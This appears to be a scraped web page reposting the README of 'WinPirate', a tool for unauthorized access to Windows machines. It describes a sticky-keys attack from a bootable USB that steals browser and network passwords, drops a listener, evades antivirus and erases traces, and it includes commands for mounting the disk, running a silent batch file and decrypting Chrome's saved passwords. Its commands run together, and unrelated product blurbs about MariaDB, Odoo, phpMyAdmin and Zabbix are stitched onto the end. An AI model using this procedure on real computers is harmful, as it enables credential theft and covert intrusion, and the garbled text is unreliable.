Automated sticky keys hack. Post exploitation it grabs browser passwords, history, and network passwords. Here’s the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB which we can call as WinPirate. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.
All without being detected by antivirus. We should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely.
Requirements : a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)
Note : chromepasswords.py requires PyWin32
If the computer is locked:
sudo -ifdisk -l (note: if you’re on Kali Linux, run parted -l)mkdir /media/windowsmount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfsIf the computer isn’t locked:
cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds
python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSVMariaDB is an open-source, multi-threaded relational database management system and a fully backward-compatible replacement for MySQL.…
Odoo 11 is an open-source all-in-one business software platform covering CRM, e-commerce, billing, accounting, manufacturing,…
Odoo is the most widely used open-source all-in-one business software suite. It integrates CRM, e-commerce, billing,…
phpMyAdmin is a free, open-source PHP application for managing MySQL and MariaDB servers through a browser.…
phpMyAdmin is a free, open-source PHP application that provides a browser-based interface for managing MySQL and…
Zabbix is a mature open-source infrastructure monitoring platform that collects metrics from network devices, servers, virtual…